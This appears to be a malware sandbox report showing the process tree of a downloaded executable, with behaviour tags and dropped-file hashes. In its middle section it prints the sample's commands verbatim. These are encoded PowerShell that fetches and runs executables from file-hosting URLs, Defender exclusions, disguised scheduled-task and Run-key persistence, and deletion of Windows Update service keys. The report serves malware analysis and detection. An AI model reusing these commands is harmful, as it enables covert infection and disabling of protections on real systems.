C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2512 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2860 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5736 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2800 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2272 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5992 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4864 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6184 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4816 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=2416 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2420 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1956 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5516 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4852 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6344 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4640 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=2800 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap31643:82:7zEvent56232⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\C4Loadupcl.exe"C:\Users\Admin\Downloads\C4Loadupcl.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYgBlAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZQB6AGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBtAGIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQA0AC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvAGEANABiAGMANAA3AGUAMQAtAGYANQBiAGUALQA0AGUANAA4AC0AOABhADUAZgAtADgANQA4ADIAOQA5AGMAMwAwAGYANwBjAC8AMQAuAGUAeABlACcALAAgADwAIwBsAGIAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAcABjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGEAaQB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEALgBlAHgAZQAnACkAKQA8ACMAbgB5AGgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AcwB0AG8AcgBlADEAMQAuAGcAbwBmAGkAbABlAC4AaQBvAC8AZABvAHcAbgBsAG8AYQBkAC8AZABpAHIAZQBjAHQALwBiADcAMwBmAGQAMQBkAGMALQA5ADEAOQA2AC0ANABkADcAYQAtADkAYgA0AGQALQBlADgAYwBmADUAYQBlADkAYQBlADQANwAvAEMANAAuAGUAeABlACcALAAgADwAIwB6AGYAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAegBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAdQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANAAuAGUAeABlACcAKQApADwAIwB3AGgAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAHQAbwByAGUAOQAuAGcAbwBmAGkAbABlAC4AaQBvAC8AZABvAHcAbgBsAG8AYQBkAC8AZABpAHIAZQBjAHQALwAxAGMAYgAzAGYAMAA1ADEALQA0ADAAMwA1AC0ANABmADYAZgAtAGIAZAA3ADIALQBkADMAMQAxAGUANABlAGQAYQA0AGQAOAAvAEEAZAB2AGEAbgBjAGUAZABEAGUAZgAuAGUAeABlACcALAAgADwAIwByAGcAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHIAeQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAZAB2AGEAbgBjAGUAZABEAGUAZgAuAGUAeABlACcAKQApADwAIwBpAHkAdAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAHQAbwByAGUANQAuAGcAbwBmAGkAbABlAC4AaQBvAC8AZABvAHcAbgBsAG8AYQBkAC8AZABpAHIAZQBjAHQALwBkADkAYQA4AGMAOAA2ADUALQBjADYAZQBlAC0ANAAxADUANwAtADgAZgA3AGEALQA2ADAAMgA1ADQAZgA3ADMAYQAyADQAMwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAHMAcgByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQBsAHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwB3AGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQQBwAHAALgBlAHgAZQAnACkAKQA8ACMAdQBrAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaAB4AGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHAAbQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEALgBlAHgAZQAnACkAPAAjAHUAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZAB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBzAGsAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQALgBlAHgAZQAnACkAPAAjAGkAYwBhACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAbAB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGMAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAGQAdgBhAG4AYwBlAGQARABlAGYALgBlAHgAZQAnACkAPAAjAHYAYgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGgAaQB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB2AGEAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBpAHYAIwA+AA=="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C4.exe"C:\Users\Admin\AppData\Local\Temp\C4.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\AdvancedDef.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedDef.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qeblzn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'OfficeManagerServices' /tr '''C:\Program Files\AdobeUpdates\Graphics\AdobeService.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\AdobeUpdates\Graphics\AdobeService.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OfficeManagerServices' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "OfficeManagerServices" /t REG_SZ /f /d 'C:\Program Files\AdobeUpdates\Graphics\AdobeService.exe' }5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4516 -s 8002⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3136 -s 8562⤵
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2084 -s 2962⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 96 -s 6402⤵
- Program crash
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 96 -s 6162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1896 -s 6482⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1896 -s 6282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4500 -s 6442⤵
- Program crash
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4500 -s 6202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4552 -s 4442⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3560 -s 7002⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4888 -s 6482⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4352 -s 3202⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 600 -s 4042⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2644 -s 7882⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4368 -s 7922⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A89.tmp.csvFilesize
34KB
MD599332121d0762d6fc2042dbff3272d96
SHA1fc4cf1f62a9a654a8bc50cb9bcb77013f61a19aa
SHA256ee4794a782a54bd3dfa0f2ffc7ad93ef6a7b25ce6f08ce5446cbe6967b1dded3
SHA5127df320e5c56e3179d1d90aac0166c521f993b550bb5b127c77941556a75cc9a7457b166c3baae9152231eed4aba5c1b84686ae54b9913286326ab3d26499d897
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB9.tmp.txtFilesize
12KB
MD551e3d4a2ba73dd20c36db87e3c543a4f
SHA135727148b913b21edeecb070a61e4e21ab7a016b
SHA256958c61255a9bfbda13c0fe2ec31ad37eee82c005fb94af1813c9a0242061abd2
SHA512104837cf2cf3072eb2ec284f606297248386c2a09d21f43c0d52c38beff9c6beaddd4e6fc39f13e232f1bc0a81a0287eb49ab276720910fcdd2ce208e94d3913
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF25.tmp.csvFilesize
38KB
MD5ace50905bd8efdbecfb08d71a7ef4e06
SHA180b6d223526aaae1831056c0cb1fbf6fe5f2fbf6
SHA2562a304f7bc6f5f81b2977805d652877a73186fa8f917593be76f80e98e16c6caf
SHA5120ac1ad114c203d5772a5bbdce3f0907e7485a0447be5bdac4cddb53d9f5ec94d037c5f3fca9925c023d5bb468959fbebf732b83b1f1f35c7476546e4fd55ac6a
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF83.tmp.txtFilesize
12KB
MD537a880922e17e118adb3a685499ffeda
SHA1d312a7b13630c53b0fd697e30cd0f581980f49d6
SHA256ea3b8154a53eb82db8bb8913a30099c623e94442e6323c9fc0135e595b288b5c
SHA5128b5996142f939db2dd1e0918cb47827a268e73ffee36fffba607704b60745cf772254040a9c99df53bf1349ab4d1fc758006fe108ec31b67d6d36a6caabcdb70
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFC3.tmp.csvFilesize
38KB
MD50ba2a3a2e502cc634b27513381ff6015
SHA17ec57cbaead44f4d4cffa8d1c1e64ca3f00808a6
SHA256362bbed74646f5b0df483dc8d520ed20a71174dff872a937f26c1d56128dfb92
SHA5120e4b93e55c8ac993443082807b6bcf9881d13f802d2b4d0b6d1795b14840f43119003669209d988de77ef225aa1a4640a0acae2d09bd606a7ce23c670df92320
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFF3.tmp.txtFilesize
12KB
MD55c9d38d61853751ec47a0f68cbcf2e78
SHA13c0d148f3ff99d37c1c4cc893399304f536f2d64
SHA2568f3be66956e9789fef1757a6631053471a781e12d2a14040a726c21f0c6aaa8a
